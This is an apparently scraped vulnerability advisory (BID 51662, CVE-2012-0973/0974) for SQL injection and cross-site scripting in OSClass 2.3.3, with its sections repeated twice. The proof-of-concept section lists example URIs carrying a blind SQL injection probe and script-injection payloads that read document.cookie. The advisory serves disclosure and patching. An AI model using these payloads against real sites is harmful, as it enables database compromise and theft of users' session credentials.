OSClass SQL Injection and Cross Site Scripting Vulnerabilities
BID:51662
Info
OSClass SQL Injection and Cross Site Scripting Vulnerabilities
| Bugtraq ID: | 51662 |
| Class: | Input Validation Error |
| CVE: |
CVE-2012-0973 CVE-2012-0974 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 25 2012 12:00AM |
| Updated: | Mar 19 2015 07:35AM |
| Credit: | High-Tech Bridge SA Security Research Lab |
| Vulnerable: |
OSclass osclass 2.3.3 |
| Not Vulnerable: |
OSclass osclass 2.3.5 |
Discussion
OSClass SQL Injection and Cross Site Scripting Vulnerabilities
OSClass is prone to SQL-injection and cross-site scripting vulnerabilities.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
OSClass 2.3.3 is vulnerable; other versions may also be affected.
OSClass is prone to SQL-injection and cross-site scripting vulnerabilities.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
OSClass 2.3.3 is vulnerable; other versions may also be affected.
Exploit / POC
OSClass SQL Injection and Cross Site Scripting Vulnerabilities
Attackers can use a browser to exploit the SQL-injection issue. The attacker must trick an unsuspecting victim into following a malicious URI to exploit the cross-site scripting issue.
The following example URIs are available:
http://www.example.com/index.php?page=search&sCategory[]=0%27%20OR%20%28SELECT%20MID%28version%28%29,1,1% 29%29=5%29%20d%20--%202
http://www.example.com/index.php?page=search&sCity=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/scrip t%3E
http://www.example.com/index.php?page=search&sPattern=%3C/title%3E%3Cscript%3Ealert%28document.cookie%29; %3C/script%3E
http://www.example.com/index.php?page=search&sPriceMax=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/s cript%3E
http://www.example.com/index.php?page=search&sPriceMin=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/s cript%3E
Attackers can use a browser to exploit the SQL-injection issue. The attacker must trick an unsuspecting victim into following a malicious URI to exploit the cross-site scripting issue.
The following example URIs are available:
http://www.example.com/index.php?page=search&sCategory[]=0%27%20OR%20%28SELECT%20MID%28version%28%29,1,1% 29%29=5%29%20d%20--%202
http://www.example.com/index.php?page=search&sCity=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/scrip t%3E
http://www.example.com/index.php?page=search&sPattern=%3C/title%3E%3Cscript%3Ealert%28document.cookie%29; %3C/script%3E
http://www.example.com/index.php?page=search&sPriceMax=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/s cript%3E
http://www.example.com/index.php?page=search&sPriceMin=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/s cript%3E
Solution / Fix
OSClass SQL Injection and Cross Site Scripting Vulnerabilities
Solution:
Updates are available. Please see the references for more information.
Solution:
Updates are available. Please see the references for more information.
References
OSClass SQL Injection and Cross Site Scripting Vulnerabilities
References:
References:
- OSClass 2.3.5 (OSclass)
- OSclass Homepage (OSclass)
- Multiple vulnerabilities in OSclass (High-Tech Bridge SA Security Research Lab)